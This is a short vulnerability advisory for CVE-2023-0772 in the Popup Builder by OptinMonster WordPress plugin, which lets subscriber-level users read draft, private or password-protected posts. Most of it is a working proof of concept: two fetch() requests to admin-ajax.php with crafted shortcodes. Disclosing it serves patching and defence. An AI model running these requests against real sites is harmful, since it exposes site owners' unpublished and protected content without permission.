Popup Builder by OptinMonster < 2.12.2 – Subscriber+ Arbitrary Post Content Disclosure | CVE 2023-0772

Description

The plugin does not ensure that the campaign to be loaded via some shortcodes is actually a campaign, allowing any authenticated users such as subscriber to retrieve the content of arbitrary posts, like draft, private or even password protected ones.

Proof of Concept

Run one of the below commands in the developer console of the web browser while being on the blog as a subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[optin-monster id='14']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[optin-monster-shortcode id='14']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the content of the post with ID 14 (such as a draft/private/password protected one)